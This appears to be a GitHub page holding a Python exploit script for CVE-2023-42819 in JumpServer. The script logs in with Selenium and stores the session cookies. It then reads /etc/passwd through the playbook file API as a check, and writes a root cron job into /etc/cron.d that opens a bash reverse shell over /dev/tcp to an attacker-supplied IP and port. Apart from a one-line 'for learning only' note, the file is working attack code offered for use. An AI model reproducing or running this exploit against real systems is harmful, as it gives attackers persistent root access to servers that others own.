-
Notifications
You must be signed in to change notification settings - Fork 3
/
CVE-2023-42819.py
329 lines (271 loc) · 13.5 KB
/
CVE-2023-42819.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
# -*- coding: utf-8 -*-
import argparse
import json
import logging
import os
import random
import string
import sys
import time
from urllib.parse import urljoin
import colorlog
import httpx
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
# 代理设置
PROXIES = {}
def banner():
print('''
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██████╗ █████╗ ██╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ██║ ██║╚════██╗██╔══██╗███║██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║███████╗╚█████╔╝ ██║ █████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝ ╚════╝ ╚═╝ ╚════╝
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: 代码仅供学习使用,请勿用于其他用途
''')
def setup_color_logging():
# 创建一个 colorlog 的日志记录器
logger_setting = colorlog.getLogger()
logger_setting.setLevel(logging.INFO)
# 创建控制台处理器并设置格式
console_handler = logging.StreamHandler(sys.stdout)
console_formatter = colorlog.ColoredFormatter(
'%(asctime)s - %(log_color)s%(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
reset=True,
log_colors={
'DEBUG': 'cyan',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'bold_red',
}
)
console_handler.setFormatter(console_formatter)
# 将处理器添加到日志记录器
logger_setting.addHandler(console_handler)
return logger_setting
# 日志记录器对象
logger = setup_color_logging()
def create_driver():
# 设置 chromedriver 的路径,使用新版的 Service
# selenium version > 4.9
service = Service(executable_path='webdriver/chromedriver.exe')
# 设置 ChromeOptions
options = webdriver.ChromeOptions()
# 设置代理
options.add_argument(f"--proxy-server={PROXIES['all://']}")
options.add_argument('--disable-gpu')
options.add_argument('--no-sandbox')
options.add_argument('--window-size=1400,800')
# 创建浏览器对象
driver = webdriver.Chrome(service=service, options=options)
return driver
def do_login(target: str, username: str, password: str):
# 获取浏览器对象
browser = create_driver()
# 打开登录页面
url = urljoin(target, '/core/auth/login/')
browser.get(url=url)
time.sleep(2)
# 定位用户名和密码输入框
username_input = browser.find_element(by=By.NAME, value='username')
password_input = browser.find_element(by=By.ID, value='password')
btn = browser.find_element(by=By.XPATH, value='//*[@id="login-form"]/div[5]/button')
# 显示等待
wait = WebDriverWait(browser, timeout=3)
wait.until(lambda username_wait: username_input.is_displayed())
wait.until(lambda password_wait: password_input.is_displayed())
wait.until(lambda btn_wait: btn.is_displayed())
# 清空输入框
username_input.clear()
password_input.clear()
# 输入用户名和密码
username_input.send_keys(username)
password_input.send_keys(password)
# 点击提交
btn.click()
# 获取当前页面的所有 cookie 信息 (返回字典)
cookies = browser.get_cookies()
# 将字典形式的 cookies 转换成 JSON 格式的字符串
json_cookies = json.dumps(cookies)
# 生成 cookie 文件名
cookie_name = f'./cookie.json'
# 将 JSON 格式的 cookies 写入到本地文件
with open(cookie_name, "w") as f:
f.write(json_cookies)
# 等待保存 cookie
time.sleep(5)
# 关闭浏览器
browser.close()
def generate_random_letters(length):
letters = string.ascii_letters # 获取所有大小写字母
random_letters = ''.join(random.choices(letters, k=length)) # 从字母中随机选择指定长度的字符并拼接起来
return random_letters
def add_cookies():
try:
# 读取 cookie.json
with open('./cookie.json', "r") as f:
json_cookies = f.read()
# 将 JSON 格式的 cookies 转换成字典形式
cookies = json.loads(json_cookies)
# 将 Cookie 列表转换为字典
cookies_dict = {cookie['name']: cookie['value'] for cookie in cookies}
# 返回 cookies
return cookies_dict
except FileNotFoundError as error:
logger.error('Read Error: %s', error)
def add_header(cookies: dict):
# 设置 headers 的 X-CSRFToken 参数
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
}
# 获取 cookies 中的 jms_csrftoken
CSRFToken = cookies['jms_csrftoken']
# 设置 headers 的 X-CSRFToken,必须带上 X-CSRFToken 参数
headers.update({'X-CSRFToken': CSRFToken})
return headers
def uid_verify(target: str, cookies: dict, headers: dict): # 如果存在 PlayBook 对象的情况下
# Set API Url
uid_url = urljoin(target, '/api/v1/ops/playbooks/')
# Get uid
try:
with httpx.Client(headers=headers, verify=False, follow_redirects=False, cookies=cookies,
proxies=PROXIES) as client:
uid_resp = client.get(url=uid_url)
# 获取 uid
if uid_resp.status_code == httpx.codes.OK and 'id' in uid_resp.text:
uid_data = json.loads(uid_resp.text)
ids = [entry['id'] for entry in uid_data]
logger.critical('Playbook API INFO: %s', uid_resp.text)
logger.critical('Playbook UID: %s', ids)
return ids[0]
else:
logger.critical('Playbook UID is not exists')
except (httpx.RequestError, httpx.HTTPStatusError) as error:
logger.error('Request error or HTTP status error: %s', error)
def add_playbook(target: str, cookies: dict, headers: dict):
playbook_url = urljoin(target, '/api/v1/ops/playbooks/')
# 随机命名
playbook_name = generate_random_letters(4)
json_data = {
'name': playbook_name,
}
try:
with httpx.Client(headers=headers, verify=False, follow_redirects=False, cookies=cookies,
proxies=PROXIES) as client:
add_resp = client.post(url=playbook_url, json=json_data)
if add_resp.status_code == 201 and 'id' in add_resp.text:
logger.critical('Successfully Added: %s', add_resp.text)
elif add_resp.status_code == 400:
logger.error('Fields must be Unique: %s', add_resp.text)
else:
logger.error('Unknown Error: %s', add_resp.headers, add_resp.text)
except (httpx.RequestError, httpx.HTTPStatusError) as error:
logger.error('Request error or HTTP status error: %s', error)
def poc(target: str, uid: str, cookies: dict, headers: dict):
poc_url = urljoin(target, '/api/v1/ops/playbook/' + uid + '/file/?key=/etc/passwd')
try:
with httpx.Client(headers=headers, verify=False, follow_redirects=False, cookies=cookies,
proxies=PROXIES) as client:
poc_resp = client.get(url=poc_url)
if 'root' in poc_resp.text:
logger.critical('Vulnerable : %s ', poc_resp.url)
logger.critical('Output: %s', poc_resp.text)
return True
else:
logger.critical('Not Vulnerable')
return False
except (httpx.RequestError, httpx.HTTPStatusError) as error:
logger.error('Request error or HTTP status error: %s', error)
def exp(target: str, uid: str, cookies: dict, headers: dict, shell_ip: str, shell_port: str):
# 创建计划任务
exp_url = urljoin(target, '/api/v1/ops/playbook/' + uid + '/file/')
# JSON
json_data = {
"key": "/etc/cron.d", # 创建路径
"is_directory": True, # 创建文件夹
"name": "/etc/cron.d", # 指定创建文件夹的名称
}
# 随机计划任务文件名
shell_name = generate_random_letters(4)
# JSON
shell_data = {
"key": "/etc/cron.d", # 创建文件的路径
"is_directory": False, # 不创建文件夹
"name": shell_name, # 创建文件的名称
"content": f"* * * * * root bash -c \"bash -i >& /dev/tcp/{shell_ip}/{shell_port} 0>&1\"\n"
# 创建文件的内容
}
try:
with httpx.Client(headers=headers, verify=False, follow_redirects=True, cookies=cookies,
proxies=PROXIES) as client:
# 创建 cron.d 目录
exp_resp = client.post(url=exp_url, json=json_data)
if exp_resp.status_code == httpx.codes.OK:
logger.critical('Directory is Successfully Created: %s', exp_resp.text)
# 创建反弹 Shell 计划任务
shell_resp = client.post(url=exp_url, json=shell_data)
if shell_resp.status_code == httpx.codes.OK:
logger.critical('Reverse Shell is Successfully Set: %s', shell_resp.text)
else:
logger.critical('Reverse Shell Failed: %s', exp_resp.text)
else:
logger.critical('Directory Creation Failed: %s', exp_resp.text)
except (httpx.RequestError, httpx.HTTPStatusError) as error:
logger.error('Request error or HTTP status error: %s', error)
def get_params(target: str):
# 获取 cookies
cookies = add_cookies()
# 获取 headers
headers = add_header(cookies)
# 获取 uid
uid = uid_verify(target, cookies, headers)
return uid, cookies, headers
def check_and_exploit(target: str, uid: str, cookies: dict, headers: dict, shell_ip: str, shell_port: str):
if poc(target, uid, cookies, headers):
exp(target, uid, cookies, headers, shell_ip, shell_port)
def main(target: str, username: str, password: str, shell_ip: str, shell_port: str):
# 判断 cookie 文件是否存在
if not os.path.exists('./cookie.json'):
# 登录并获取 cookies 和 headers
logger.warning('Cookie is not exists, DO LOGIN')
do_login(target, username, password)
# 如果存在 uid,则执行 poc 和 exp 动作
uid, cookies, headers = get_params(target)
if uid:
check_and_exploit(target, uid, cookies, headers, shell_ip, shell_port)
else:
# 如果不存在 uid,则执行添加动作
add_playbook(target, cookies, headers)
uid, cookies, headers = get_params(target)
check_and_exploit(target, uid, cookies, headers, shell_ip, shell_port)
else:
# 如果存在 cookies,且存在 uid,则直接读取 cookies 和 uid
uid, cookies, headers = get_params(target)
# 如果存在 uid,则执行 poc 和 exp 动作
if uid:
check_and_exploit(target, uid, cookies, headers, shell_ip, shell_port)
else:
# 如果不存在 uid,则执行添加动作
add_playbook(target, cookies, headers)
uid, cookies, headers = get_params(target)
check_and_exploit(target, uid, cookies, headers, shell_ip, shell_port)
if __name__ == '__main__':
banner()
parser = argparse.ArgumentParser(description='CVE-2023-42819 by C1ph3rX13.')
parser.add_argument('-t', '--target', type=str, required=True, help='target url')
parser.add_argument('-u', '--username', type=str, required=True, help='account username')
parser.add_argument('-p', '--password', type=str, required=True, help='account password')
parser.add_argument('--ip', type=str, required=True, help='shell ip')
parser.add_argument('--port', type=str, required=True, help='shell port')
parser.add_argument("--proxy", type=str, required=False, help="proxy to http://ip:port")
args = parser.parse_args()
if args.proxy:
PROXIES = {'all://': f'{args.proxy}'}
main(args.target, args.username, args.password, args.ip, args.port)